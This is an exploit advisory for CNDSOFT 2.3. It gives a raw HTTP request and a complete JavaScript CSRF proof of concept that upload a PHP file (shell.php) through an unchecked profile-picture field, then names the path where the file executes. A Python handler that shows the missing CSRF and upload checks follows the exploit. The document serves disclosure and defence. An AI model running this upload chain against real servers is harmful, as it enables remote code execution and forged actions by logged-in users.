CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

2016.10.21
Credit: Besim
Risk: Low
Local: No
Remote: Yes
CVE: N/A

*=========================================================================================================
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
*=========================================================================================================

Vulnerable URL and Parameter
========================================

Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
Vulnerable Parameter = kullanici_resmi (the multipart file field of the "define user" form; neither the file name nor the content of the upload is checked)

TECHNICAL DETAILS & POC & POST DATA
========================================

The user-definition form (is=kullanici_tanimla) accepts a profile picture in the kullanici_resmi field. The application stores the file under the client-supplied name, so a part named shell.php whose body is PHP code is written as-is into personel_resimleri/ and can then be requested directly, where the web server executes it. The MAX_FILE_SIZE field is only a browser-side hint and does not limit what the server accepts. The form also carries an authenticity_token field, but the CSRF PoC below replays a fixed token value captured earlier; the cross-site upload can only succeed because the application does not verify that token against the victim's session.

POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
Content-Type: multipart/form-data; boundary=---------------------------5035863528338
Content-Length: 1037

-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"

✓
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"

CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"

m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_resmi"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"

5200
-----------------------------5035863528338--

CSRF PoC - File Upload (shell.php)
========================================

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://site_name/ofis/index.php?is=kullanici_tanimla", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
  // The victim's browser attaches its ofis/ session cookie to the cross-origin POST.
  xhr.withCredentials = true;
  var body = "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"utf8\"\r\n" +
    "\r\n" +
    "\xe2\x9c\x93\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"authenticity_token\"\r\n" +
    "\r\n" +
    "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
    "\r\n" +
    "meryem\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n" +
    "\r\n" +
    "meryem\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
    "\r\n" +
    "m@yop.com\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
    "\r\n" +
    "30000\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x3c?php \r\n" +
    "\tphpinfo();\r\n" +
    "\r\n" +
    " ?\x3e\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
    "\r\n" +
    "5200\r\n" +
    "-----------------------------5035863528338--\r\n";
  // Send the body byte-for-byte so the multipart boundaries are not re-encoded.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

========================================

Access File: http://www.site_name/path/personel_resimleri/shell.php

RISK
========================================

An attacker can upload arbitrary files, including PHP code, and execute them on the server by requesting them from personel_resimleri/. Because the request is not protected against CSRF, a user who is logged in to the ofis/ panel can be made to perform the upload simply by visiting an attacker-controlled page.

--
Besim ALTINOK
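The two checks whose absence the advisory describes, as an added example in Python (not CNDSOFT's PHP and not the author's code): it parses a multipart body shaped like the PoC above, rejects an authenticity_token that is not bound to the victim's session, and refuses the shell.php part both by extension and by content before giving the file a server-chosen name. The boundary and token strings are copied from the advisory's request as constructed sample data; every function name and the ALLOWED_MAGIC table are this example's own assumptions.

```python
"""Reference handler for a "kullanici_resmi" upload form.

Added example, not CNDSOFT code. Parses a multipart/form-data body like the
advisory's PoC and applies the checks the vulnerable handler lacks: a
session-bound CSRF token and validation of the uploaded image.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Boundary copied from the advisory's request; any value works.
BOUNDARY = "---------------------------5035863528338"

# Constructed sample: stands in for the token stored in the victim's session.
SESSION_CSRF_TOKEN = "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I="

# Image types the profile-picture field may accept, keyed by extension, with the
# leading bytes a genuine file of that type must start with (assumed allowlist).
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 30000  # enforced server-side; the form's MAX_FILE_SIZE is only a hint


def build_body(filename: str, content: bytes, token: Optional[str]) -> bytes:
    """Build a multipart body with the same fields as the advisory's PoC (constructed sample)."""
    fields = [("kullanici_adi", b"meryem"), ("kullanici_sifresi", b"meryem"),
              ("kullanici_mail_adresi", b"m@yop.com"), ("MAX_FILE_SIZE", b"30000"),
              ("personel_maasi", b"5200")]
    if token is not None:
        fields.insert(0, ("authenticity_token", token.encode()))
    out = bytearray()
    for name, value in fields:
        out += f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
        out += value + b"\r\n"
    out += (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="kullanici_resmi"; '
            f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n').encode()
    out += content + b"\r\n"
    out += f"--{BOUNDARY}--\r\n".encode()
    return bytes(out)


def parse_multipart(body: bytes) -> Dict[str, Tuple[Optional[str], bytes]]:
    """Minimal multipart/form-data parser: field name -> (filename or None, raw bytes)."""
    delim = f"--{BOUNDARY}".encode()
    parts: Dict[str, Tuple[Optional[str], bytes]] = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):   # that CRLF belongs to the next delimiter, not the value
            data = data[:-2]
        name = fname = None
        for line in head.decode("latin-1").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                for param in line.split(";")[1:]:
                    key, _, val = param.strip().partition("=")
                    if key == "name":
                        name = val.strip('"')
                    elif key == "filename":
                        fname = val.strip('"')
        if name is not None:
            parts[name] = (fname, data)
    return parts


def validate_image_upload(filename: Optional[str], content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason or storage name). Nothing the client sent is trusted."""
    if not filename:
        return False, "no file name"
    # Only the final extension counts: "shell.php" and "shell.png.php" both end in php.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_MAGIC:
        return False, f"extension not allowed: {ext or '(none)'}"
    if len(content) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if not content.startswith(ALLOWED_MAGIC[ext]):
        return False, f"content does not match a {ext} image"
    # Store under a server-generated name so the client's file name never reaches disk.
    return True, f"{secrets.token_hex(16)}.{ext}"


def csrf_token_valid(submitted: Optional[bytes], session_token: str) -> bool:
    """Accept only the token bound to this session, compared in constant time."""
    return submitted is not None and hmac.compare_digest(submitted, session_token.encode())


def handle_user_form(body: bytes, session_token: str) -> Tuple[int, str]:
    """Process one POST to is=kullanici_tanimla; returns (HTTP status, message)."""
    fields = parse_multipart(body)
    token = fields.get("authenticity_token", (None, None))[1]
    if not csrf_token_valid(token, session_token):
        return 403, "CSRF token missing or not bound to this session"
    fname, data = fields.get("kullanici_resmi", (None, b""))
    ok, detail = validate_image_upload(fname, data)
    if not ok:
        return 400, detail
    return 200, f"stored as personel_resimleri/{detail}"


if __name__ == "__main__":
    poc = build_body("shell.php", b"<?php phpinfo(); ?>", SESSION_CSRF_TOKEN)
    print(handle_user_form(poc, "token-of-some-other-session"))  # 403: replayed token
    print(handle_user_form(poc, SESSION_CSRF_TOKEN))              # 400: .php rejected
```

The order of the checks matters: the CSRF decision is taken before any file is touched, so a forged cross-site request never reaches the upload code, and the magic-byte check closes the usual follow-up of renaming the PHP payload to .png once the extension filter is in place.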


Copyright 2024, cxsecurity.com

 
